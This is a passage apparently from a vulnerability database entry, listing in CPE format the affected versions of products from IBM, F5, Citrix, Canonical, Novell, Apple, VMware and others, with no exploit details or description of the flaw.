Ibm>>Qradar_vulnerability_manager >> Version 7.2.3
Ibm>>Qradar_vulnerability_manager >> Version 7.2.4
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.6
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Qradar_vulnerability_manager >> Version 7.2.8
Ibm>>Smartcloud_entry_appliance >> Version 2.3.0
Ibm>>Smartcloud_entry_appliance >> Version 2.4.0
Ibm>>Smartcloud_entry_appliance >> Version 3.1.0
Ibm>>Smartcloud_entry_appliance >> Version 3.2.0
Ibm>>Smartcloud_provisioning >> Version 2.1.0
Ibm>>Software_defined_network_for_virtual_environments >> Version To (excluding) 1.2.1
Ibm>>Software_defined_network_for_virtual_environments >> Version To (excluding) 1.2.1
Ibm>>Software_defined_network_for_virtual_environments >> Version To (excluding) 1.2.1
Ibm>>Starter_kit_for_cloud >> Version 2.2.0
Ibm>>Workload_deployer >> Version From (including) 3.1.0 To (including) 3.1.0.7
Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.1
- Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.1 (Open CPE detail)
Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.2
- Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.2 (Open CPE detail)
Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.3
- Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.3 (Open CPE detail)
Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.5
- Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.5 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.1
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.1 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.2
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.2 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.3
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.3 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.4
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.4 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.5
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.5 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.6
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.6 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.7
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.7 (Open CPE detail)
Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.8
- Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.8 (Open CPE detail)
Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.2
- Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.2 (Open CPE detail)
Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.3
- Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.3 (Open CPE detail)
Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.5
- Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.5 (Open CPE detail)
Configuraton 0
Ibm>>Storwize_v7000_firmware >> Version From (including) 1.1.0.0 To (excluding) 1.4.3.5
Ibm>>Storwize_v7000_firmware >> Version From (including) 1.5.0.0 To (excluding) 1.5.0.4
Ibm>>Storwize_v7000_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9
Ibm>>Storwize_v7000_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7
Ibm>>Storwize_v7000 >> Version -
Configuraton 0
Ibm>>Storwize_v5000_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11
Ibm>>Storwize_v5000_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9
Ibm>>Storwize_v5000_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7
Ibm>>Storwize_v5000 >> Version -
Configuraton 0
Ibm>>Storwize_v3700_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11
Ibm>>Storwize_v3700_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9
Ibm>>Storwize_v3700_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7
Ibm>>Storwize_v3700 >> Version -
Configuraton 0
Ibm>>Storwize_v3500_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11
Ibm>>Storwize_v3500_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9
Ibm>>Storwize_v3500_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7
Ibm>>Storwize_v3500 >> Version -
Configuraton 0
Ibm>>Flex_system_v7000_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11
Ibm>>Flex_system_v7000_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9
Ibm>>Flex_system_v7000_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7
Ibm>>Flex_system_v7000 >> Version -
Configuraton 0
Ibm>>San_volume_controller_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11
Ibm>>San_volume_controller_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9
Ibm>>San_volume_controller_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7
Ibm>>San_volume_controller >> Version -
Configuraton 0
Ibm>>Stn6500_firmware >> Version From (including) 3.8.0.0 To (excluding) 3.8.0.07
Ibm>>Stn6500_firmware >> Version From (including) 3.9.1.0 To (excluding) 3.9.1.08
Ibm>>Stn6500_firmware >> Version From (including) 4.1.2.0 To (excluding) 4.1.2.06
Ibm>>Stn6500 >> Version -
Configuraton 0
Ibm>>Stn6800_firmware >> Version From (including) 3.8.0.0 To (excluding) 3.8.0.07
Ibm>>Stn6800_firmware >> Version From (including) 3.9.1.0 To (excluding) 3.9.1.08
Ibm>>Stn6800_firmware >> Version From (including) 4.1.2.0 To (excluding) 4.1.2.06
Ibm>>Stn6800 >> Version -
Configuraton 0
Ibm>>Stn7800_firmware >> Version From (including) 3.8.0.0 To (excluding) 3.8.0.07
Ibm>>Stn7800_firmware >> Version From (including) 3.9.1.0 To (excluding) 3.9.1.08
Ibm>>Stn7800_firmware >> Version From (including) 4.1.2.0 To (excluding) 4.1.2.06
Ibm>>Stn7800 >> Version -
Configuraton 0
Canonical>>Ubuntu_linux >> Version 10.04
Canonical>>Ubuntu_linux >> Version 12.04
Canonical>>Ubuntu_linux >> Version 14.04
Configuraton 0
Novell>>Zenworks_configuration_management >> Version 10.3
Novell>>Zenworks_configuration_management >> Version 11
Novell>>Zenworks_configuration_management >> Version 11.1
Novell>>Zenworks_configuration_management >> Version 11.2
Novell>>Zenworks_configuration_management >> Version 11.3.0
Novell>>Open_enterprise_server >> Version 2.0
Novell>>Open_enterprise_server >> Version 11.0
Configuraton 0
Checkpoint>>Security_gateway >> Version To (excluding) r77.30
Configuraton 0
F5>>Big-ip_access_policy_manager >> Version From (including) 10.1.0 To (including) 10.2.4
F5>>Big-ip_access_policy_manager >> Version From (including) 11.0.0 To (including) 11.5.1
F5>>Big-ip_access_policy_manager >> Version 11.6.0
F5>>Big-ip_advanced_firewall_manager >> Version From (including) 11.3.0 To (including) 11.5.1
F5>>Big-ip_advanced_firewall_manager >> Version 11.6.0
F5>>Big-ip_analytics >> Version From (including) 11.0.0 To (including) 11.5.1
F5>>Big-ip_analytics >> Version 11.6.0
F5>>Big-ip_application_acceleration_manager >> Version From (including) 11.4.0 To (including) 11.5.1
F5>>Big-ip_application_acceleration_manager >> Version 11.6.0
F5>>Big-ip_application_security_manager >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_application_security_manager >> Version From (including) 11.0.0 To (including) 11.5.1
F5>>Big-ip_application_security_manager >> Version 11.6.0
F5>>Big-ip_edge_gateway >> Version From (including) 10.1.0 To (including) 10.2.4
F5>>Big-ip_edge_gateway >> Version From (including) 11.0.0 To (including) 11.3.0
F5>>Big-ip_global_traffic_manager >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_global_traffic_manager >> Version From (including) 11.0.0 To (including) 11.5.1
F5>>Big-ip_global_traffic_manager >> Version 11.6.0
F5>>Big-ip_link_controller >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_link_controller >> Version From (including) 11.0.0 To (including) 11.5.1
F5>>Big-ip_link_controller >> Version 11.6.0
F5>>Big-ip_local_traffic_manager >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_local_traffic_manager >> Version From (including) 11.0.0 To (including) 11.5.1
F5>>Big-ip_local_traffic_manager >> Version 11.6.0
F5>>Big-ip_policy_enforcement_manager >> Version From (including) 11.3.0 To (including) 11.5.1
F5>>Big-ip_policy_enforcement_manager >> Version 11.6.0
F5>>Big-ip_protocol_security_module >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_protocol_security_module >> Version From (including) 11.0.0 To (including) 11.4.1
F5>>Big-ip_wan_optimization_manager >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_wan_optimization_manager >> Version From (including) 11.0.0 To (including) 11.3.0
F5>>Big-ip_webaccelerator >> Version From (including) 10.0.0 To (including) 10.2.4
F5>>Big-ip_webaccelerator >> Version From (including) 11.0.0 To (including) 11.3.0
F5>>Big-iq_cloud >> Version From (including) 4.0.0 To (including) 4.4.0
F5>>Big-iq_device >> Version From (including) 4.2.0 To (including) 4.4.0
F5>>Big-iq_security >> Version From (including) 4.0.0 To (including) 4.4.0
F5>>Enterprise_manager >> Version From (including) 2.1.0 To (including) 2.3.0
F5>>Enterprise_manager >> Version From (including) 3.0.0 To (including) 3.1.1
F5>>Traffix_signaling_delivery_controller >> Version From (including) 4.0.0 To (including) 4.0.5
F5>>Traffix_signaling_delivery_controller >> Version 3.3.2
F5>>Traffix_signaling_delivery_controller >> Version 3.4.1
F5>>Traffix_signaling_delivery_controller >> Version 3.5.1
F5>>Traffix_signaling_delivery_controller >> Version 4.1.0
Configuraton 0
F5>>Arx_firmware >> Version From (including) 6.0.0 To (including) 6.4.0
F5>>Arx >> Version -
Configuraton 0
Citrix>>Netscaler_sdx_firmware >> Version To (excluding) 9.3.67.5r1
Citrix>>Netscaler_sdx_firmware >> Version From (including) 10 To (excluding) 10.1.129.11r1
Citrix>>Netscaler_sdx_firmware >> Version From (including) 10.5 To (excluding) 10.5.52.11r1
Citrix>>Netscaler_sdx >> Version -
Configuraton 0
Apple>>Mac_os_x >> Version From (including) 10.0.0 To (excluding) 10.10.0
Configuraton 0
Vmware>>Vcenter_server_appliance >> Version 5.0
Vmware>>Vcenter_server_appliance >> Version 5.0
Vmware>>Vcenter_server_appliance >> Version 5.0
Vmware>>Vcenter_server_appliance >> Version 5.1
Vmware>>Vcenter_server_appliance >> Version 5.1
Vmware>>Vcenter_server_appliance >> Version 5.1
Vmware>>Vcenter_server_appliance >> Version 5.5
Vmware>>Vcenter_server_appliance >> Version 5.5
Vmware>>Esx >> Version 4.0
Vmware>>Esx >> Version 4.1
References